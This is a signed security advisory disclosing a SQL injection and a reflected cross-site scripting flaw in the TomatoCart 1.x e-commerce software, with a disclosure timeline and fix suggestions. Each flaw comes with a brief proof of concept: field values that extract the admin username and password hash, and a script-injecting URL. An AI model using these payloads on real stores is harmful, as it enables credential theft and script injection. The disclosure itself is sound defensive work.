TomatoCart 1.x Cross Site Scripting / SQL Injection

`  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
CVE-2014-3978 - Remote SQL Injection Vulnerability  
CVE-2014-3830 - Reflected Cross Site Scripting  
  
-  
------------------------------------------------------------------------------  
Title:  
TomatoCart v1.x (latest-stable) Remote SQL Injection Vulnerability  
  
Background:  
TomatoCart is open source ecommerce solution developed and  
maintained by a  
number of 64,000+ users from 50+ countries and regions. It's distributed  
under  
the terms of the GNU General Public License (or "GPL"), free to download and  
share. The community, including project founders and other developers, are  
supposed to work together on the platform of TomatoCart, contributing  
features,  
technical support and services. The current stable package is TomatoCart  
V1.1.8.6.1, while the latest development version is version 2.0 Alpha  
4. This  
exploit affects the "stable" tree.  
  
Timeline:  
06 June 2014 - CVE-2014-3978 assigned  
06 June 2014 - Submitted to vendor  
25 June 2014 - Received inadequate patch from vendor  
26 June 2014 - Suggested patch sent to vendor  
17 July 2014 - Request for update from vendor, no response.  
05 August 2014 - Pull request sent on github for full patch  
  
Status:  
Vendor ignored, see suggested fix below.  
  
Released:  
05 August 2014 -  
https://breaking.technology/advisories/CVE-2014-3978.txt  
  
Classification:  
SQL Injection  
  
Exploit Complexity:  
Low  
  
Severity:  
High  
  
Description:  
TomatoCart suffers from a systemic vulnerability in its query factory,  
allowing attackers to circumvent user input sanitizing to perform remote SQL  
injection.  
  
Required Information:  
* Valid user account  
  
PoC:  
Create a new contact in your address book using the following values.  
  
First name: :entry_lastname,  
Last Name : ,(select user_name from toc_administrators order by id asc  
limit 1),(select user_password from toc_administrators order by id asc limit  
1),3,4,5,6,7,8,9,10)#  
  
The new contact will be added to your address book with the admin  
hash as  
the contact's street address  
  
Suggested Action:  
Pull request has been sent to the developers on github. Recommend  
patching  
the required to properly encode colon (:)  
https://github.com/tomatocart/TomatoCart-v1/pull/238  
  
  
  
  
-  
------------------------------------------------------------------------------  
  
Title:  
TomatoCart v1.x Reflected Cross Site Scripting Vulnerability  
  
Background:  
TomatoCart is open source ecommerce solution developed and  
maintained by a  
number of 64,000+ users from 50+ countries and regions. It's distributed  
under  
the terms of the GNU General Public License (or "GPL"), free to download and  
share. The community, including project founders and other developers, are  
supposed to work together on the platform of TomatoCart, contributing  
features,  
technical support and services. The current stable package is TomatoCart  
V1.1.8.6.1, while the latest development version is version 2.0 Alpha  
4. This  
exploit affects the "stable" tree.  
  
  
Timeline:  
22 May 2014 - CVE-2014-3830 assigned  
06 June 2014 - Submitted to vendor  
25 June 2014 - Received inadequate patch from vendor  
26 June 2014 - Suggested patch sent to vendor  
17 July 2014 - Request for update from vendor, no response.  
05 August 2014 - Pull request sent on github for full patch  
  
Status:  
Vendor ignored, see suggested fix below.  
  
Released:  
05 August 2014 -  
https://breaking.technology/advisories/CVE-2014-3830.txt  
  
Classification:  
Reflected Cross Site Scripting  
  
Exploit Complexity:  
Low  
  
Severity:  
Moderate  
  
Description:  
TomatoCart suffers from a lack of and/or improper input validation  
  
PoC:  
  
http://tomatocartserver/info.php?faqs&faqs_id=1';</script><script>alert('xss');<  
/script>  
  
Suggested Action:  
Pull request has been sent to the developers on github. Recommend  
patching  
the required files to properly use htmlentities() for input variables  
https://github.com/tomatocart/TomatoCart-v1/pull/238  
  
  
-  
------------------------------------------------------------------------------  
  
  
Again, we would like to stress that this is NOT a guarantee of the  
security of  
this product. This simply fixes the SQL injection vulnerabilities we  
were able  
to discover on our first glance. If we were able to discover these  
at-a-glance  
then imagine what could potentially be in the wild.  
  
  
- - - Breaking Technology Staff  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.11 (GNU/Linux)  
  
iQIcBAEBAgAGBQJT4i+VAAoJEEabgwf7HzMLHuEP/A+ApRJqGYvh4y2324BvqL3B  
Dq9RDR+JhxGPZoOICECMgGTjIQUN4jWRpVOw+uG7ApTxakChIb80P6aSbCr1uWIs  
nYGqnE48GqIzKrCmNu4w4TjBywsjDdUMkUyrpZQgo+lcsG+7eGFxq3r6FoKiNSZL  
Kd9jXCyWOY6F+KuWXRbLdYjKBP8f4Mog/RjANibP61OUpicJ2wV0Hvf9WN+ZAYO7  
VRMrBa7hp2lBu9Wz9RuELCHLnkCZqS03kUFNLTbDEKwBnTIteT1vxCe1gmyU9kUv  
kgdqwv71eOjhf5Vz9SmmvUO6FeZ3RkIhPaNB8W0c2jjdpFjCqFA7o69ZrR3KTfYl  
69XIQTo0EnjMw2ABtvtGCLSC/x+GlxrD2kMSxmTrrFkMN23i+NZoNp/YJxNekXXS  
FaAW2kXph4O52KFYLCO3S99Ga+bDxUfbS/q8+K/L8C70PeyS9HiipC4Fa/DCVWjG  
xBq71BV1MVEZv3T67m/8Bu5lH1pyXRz9k65gLWAkJe6dBwZY2drwelefXOSourTF  
08Ec7zrGWhNjzxdmwNGvbXBxEBa5HeamKJWOeNrOxe7GAaXLYZJGtG6iFFyHagYh  
5zR+i1TeSydN0Px369vA5f5LIGza8+Phzv7J9XCXuqtppXA4TE5sTp28Q5r5fMW+  
r6GEiiy9fYNLRYzt4/la  
=I0ak  
-----END PGP SIGNATURE-----  
`